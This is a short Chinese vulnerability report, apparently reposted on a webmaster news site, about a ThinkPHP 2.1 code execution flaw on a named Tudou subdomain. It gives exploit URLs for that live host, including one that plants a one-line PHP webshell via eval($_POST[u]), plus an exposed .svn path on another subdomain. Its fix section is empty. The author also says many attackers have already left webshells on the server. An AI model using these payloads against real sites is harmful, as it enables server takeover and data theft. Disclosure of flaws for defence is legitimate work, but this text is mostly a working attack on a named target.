土豆某站代码执行下载

土豆某站代码执行1.土豆某个网站使用ThinkPHP 2.1的框架导致代码执行漏洞,虽然修补了其它的几个代码执行漏洞,但是现在我提到的这个漏洞却没有修复。如下:

 

http://club3.bmw.tudou.com/?s=/a/a/a/{${phpinfo()}}

2.直接构造一句话木马,

 

http://club3.bmw.tudou.com/?s=/a/a/a/{${eval($_POST[u])}}

3.database:

 

4.svn泄漏:

http://a.tudou.com/testbwm/.svn/entries

修复方案:

PS:我不会告诉你上面已经有很多人的大马小马一句话马了,所以你还是自己多发点奖金给自己的安全部门员工吧,不然他们不会认真工作搞好防黑客的网络安全工作哦

当前位置:站长啦网站目录 » 站长资讯 » 站长新闻 » 漏洞预警 » 文章详细